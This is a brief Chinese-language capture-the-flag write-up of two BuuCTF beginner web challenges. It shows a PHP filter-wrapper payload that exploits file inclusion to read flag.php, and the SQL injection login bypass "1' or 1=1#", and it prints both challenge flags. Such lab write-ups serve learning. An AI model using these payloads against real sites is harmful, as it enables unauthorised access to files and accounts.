BuuCTF-WEB部分基础题-1

BuuCTF-WEB部分基础题（1）

感觉这些题单独写有点少……所以写一块。

[ACTF2020 新生赛]Include

1.题目链接：

2.过程：

题目说明’include’为文件包含漏洞。打开后有一个tips，点开后URL出现了file=flag.php.的调用。

flag应该在flag.php中，但是以php语句解释并运行，导致flag无法正常显示……

所以可以在中间对其进行base64编码，使其无法运行……

payload：?file=php://filter/read=convert.base64-encode/resource=flag.php

base64解码后：

<?php
echo "Can you find out the flag?";
//flag{d962dde8-63dd-4b9d-bed6-ca2d1234e05a}

em，原来是注释掉了……

[极客大挑战 2019]EasySQL

1.题目链接：

2.过程：

我是cl4y，是一个WEB开发程序员，最近我做了一个网站，快来看看它有多精湛叭！

SQL也是刚学，找个简单的练练手……

打开之后是一个用户登录界面。

随便一输，回显“NO,Wrong username password！！！”

试试我新学的万能密码

1' or 1=1#

'闭合掉上一个语句，or 1=1 恒true，#注释掉后面的语句

结果直接把flag打出来了……

flag{44c19f5a-76e2-4d2a-b95f-50755985dc5a}

……